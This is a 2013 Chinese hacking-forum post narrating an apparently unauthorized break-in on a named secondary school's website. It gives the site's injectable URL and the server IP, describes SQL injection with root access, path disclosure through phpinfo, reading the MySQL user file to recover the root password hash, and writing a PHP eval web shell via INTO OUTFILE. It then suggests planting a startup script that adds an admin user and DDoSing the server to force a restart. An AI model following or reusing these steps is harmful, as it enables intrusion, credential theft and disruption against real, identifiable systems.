中国网络渗透测试联盟

标题: 友情检测湖北省大治市第一中学 [打印本页]

作者: admin    时间: 2013-1-11 21:32
标题: 友情检测湖北省大治市第一中学
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏/ o3 r1 x6 r, `2 w
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
/ n8 P3 T* I7 x9 Z- f1 w
2 e5 \9 J$ e# s# p/ y& Q1 {8 o" w# s2 X0 X& p3 P1 Q6 y' T' _/ b9 f, b
. T* B9 E1 H: R! Q! S6 a" Q5 p
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
1 U" I( C6 ^: q. d
: d. L1 C" q/ C# P. m那么想可以直接写入shell ,getshell有几个条件:8 _; Y3 v& j  G( i6 D# C  w( d2 e
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF: [! H! d1 L0 J5 h+ G/ y" d

; |4 v! I/ Z$ }% ~& h; a: H( `3 m/ ?试着爆绝对路径:
9 T0 W) K8 S! k4 e, d! }1./phpMyAdmin/index.php?lang[]=1  
: d( g3 q/ N4 u  S( B2./phpMyAdmin/phpinfo.php  
" h. `% v: H0 c; c3 r3./load_file()  0 }$ O$ y) ^; o8 s$ [6 [
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
( ]; W5 ~" E; T( Z  J5./phpmyadmin/libraries/select_lang.lib.php  
" g' h' o2 M) N6 D5 d5 d' s6 U6./phpmyadmin/libraries/lect_lang.lib.php  
: P' z, ?/ m2 s7./phpmyadmin/libraries/mcrypt.lib.php   
2 N0 `# k' j. {% h8 f8./phpmyadmin/libraries/export/xls.php  - b) l1 A. d4 Z7 L1 V! o
) D6 D2 c) Z& ], g& G
均不行...........................
+ s- ?! T9 V& m7 z: y3 d$ M8 ^% h. g$ O- [/ A
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php4 V- A- x9 y; d% V

  m" N0 {+ s9 N! q& r$ P% Q: R权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
1 I1 X8 C/ E) y: D6 C6 [# t1 ~8 \
4 ?+ v" ^- M6 ~" b0 C, x默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
/ X! ]+ m+ ?! o0 ~4 U4 N  a
! o( ?. g1 V9 x) d敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........4 u6 l5 L# E6 \, L1 _; }

; H/ ~" }# q$ V0 u想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 8 n$ B$ |  v* N0 u# ?/ A7 _

4 l* r6 `" b- G0 f5 dhttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
% m- k; ^: z! A  K/ b5 {
1 a9 i" ]6 S$ r7 D/ L: F自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD * Q6 J, Z9 t8 A# U4 V* \2 `3 |8 L
; r: c8 i+ B8 ?1 X6 O
成功读到root密码:$ {5 U' `- Q' U. a

* o, ^" W; X& A" `3 }8 u17---- r(0072)
" w- q, y" Q: H7 W9 X# B' Q18---- o(006f)7 h3 T$ ~" w0 e6 u* S2 g6 a) e; d9 |
19---- o(006f)
# A- \4 ~! O! O8 ^+ J8 X! I$ i# ^20---- t(0074)
+ j2 e( Y1 Y6 x* j! x4 o21---- *(002a)
# K0 A% m% S1 Y2 @" J22---- 8(0038)
2 u, N/ o2 a$ w( u. p. ^, n3 d0 r+ H4 q23---- 2(0032)2 @! g+ m% u" L" X
24---- E(0045)
+ y5 d& L$ s9 J/ t% b# r25---- 1(0031); z- u7 T- E+ w
26---- C(0043)0 C7 q$ B: k; I3 [" |5 }  Z
27---- 5(0035); M+ T& Z! s' O
28---- 8(0038)
+ G  [" }7 b* }+ \+ f+ E29---- 2(0032); d. J- U9 p6 ]4 _" m) x3 s9 F) ^" J
30---- 8(0038)& a8 u+ V7 K4 j: W* Q8 Q
31---- A(0041)9 y; b7 q$ u4 S
32---- 9(0039)
" Z3 {8 N! ~, Z1 @8 e  K33---- B(0042)
  S) q9 z' N5 j5 q0 K% ~$ _# V, q9 y34---- 5(0035)# M* ]9 `0 e/ Y$ `, h
35---- 4(0034)
' N  @% p! u- C7 e36---- 8(0038)
# P2 x: ^1 `9 Q# P4 u$ U+ N% W37---- 6(0036)5 v3 V- F% r: {# Z
38---- 4(0034)% l) i7 [) j- b0 @) F2 N& S) J
39---- 9(0039)
& x; Y2 P  w0 z& d9 l' I40---- 1(0031)
( I5 o( W7 b$ E* _$ a, @; Q; z41---- 1(0031)+ n' o6 w  M" v- n) y1 h+ o9 j
42---- 5(0035)
$ H* b( L4 u  }: i0 i! X43---- 3(0033)
* V" b: r1 [2 |( w44---- 5(0035). R% Y6 J* x# g3 @* x0 L
45---- 9(0039)+ [  t0 G4 z. |* U
46---- 8(0038)' ^" K* g. {/ g. Y# M& Q# p4 B9 W7 l
47---- F(0046)
1 ]  l# T' m; V( p) y+ s48---- F(0046)
2 H) x  p8 v/ _( H49---- 4(0034)
& ]. L! L5 p0 W' }, P1 g50---- F(0046)
) e5 Q+ `* ^8 C# Z+ t/ G3 C51---- 0(0030)
, Y9 y! o. Z8 q* j- |  Y$ R7 \52---- 3(0033)7 v: i' Z. n' Z$ B7 W
53---- 2(0032)
& _2 X! v8 Y9 @+ C- V" L8 V54---- A(0041)
; Q( }& F$ @" b2 j; A" ]: [# ]55---- 4(0034)
! Q' m$ }+ W: F. T/ a56---- A(0041)
/ Y: y9 y- t# s$ b  W57---- B(0042)
: w% r6 s4 O* @" M58---- *(0044)
9 x, G7 E4 r6 O1 a0 y( R* L( p59---- *(0035)+ h# O9 x  L* D7 R6 R$ d1 r1 M7 S( `
60---- *(0041)) y9 c  `7 ]. X& |; C6 g
61---- *0032)
( V+ y% H9 q0 H& W
* Y5 A5 j! c" I( j7 m: v解密后成功登陆phpmyamin7 c7 J$ h  d2 i4 ?+ \8 \
                          . G% c8 n# K) Y5 A$ F2 Z' C
9 d& `* D7 @( A
                             [attach]164[/attach]
4 @, Q' l: O0 K1 g' _" A3 D$ v
& N9 y: e" P& B2 I找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
/ b( m: |7 `! `# _) |' g; p% v/ J
成功执行,拿下shell,菜刀连接:
" _! M" Z! x0 O8 b  [
9 ?# l$ s" j/ X# ~& g/ B+ h服务器不支持asp,aspx,php提权无果...................% \7 ?  v" r- y" h) P* E

; Q7 K- t) W4 R" J5 a但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:. o$ v6 y$ [$ F3 ?
服务器上已经有个隐藏帐号了
* l2 n3 B$ l5 X8 H. L' J- H
别名     administrators4 N4 R0 l5 ?  ^  E2 B7 W
注释     管理员对计算机/域有不受限制的完全访问权
2 R- I+ Y$ j* g6 o8 K
成员
8 J7 f- u: _# R' n  @
-------------------------------------------------------------------------------
6 u8 T3 ?( F! w4 ~* dadmin, T9 J+ _6 {* N5 g
Administrator
' ]6 S$ Y+ E+ W' N" q& Uslipper$7 e* X/ N) l; v/ W0 D
sqluser
. d3 z$ D3 @- j6 R8 r命令成功完成。 * f( B* r! H: {2 R0 r* ?

* t0 ?- _# w! p2 v服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
" Y/ O- `: N5 w; n8 ^, g) }
' |7 |/ Z2 A* ~* a6 B  w9 |; qddos服务器重启,不然就只能坐等服务器重启了...............................
* o! f9 j7 I8 N! B: A2 a- c' g" {4 r7 E4 `$ C; H) p1 H! I
      

9 r& A4 w7 J! l4 v. \4 d' V
作者: angel    时间: 2013-5-20 15:28





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2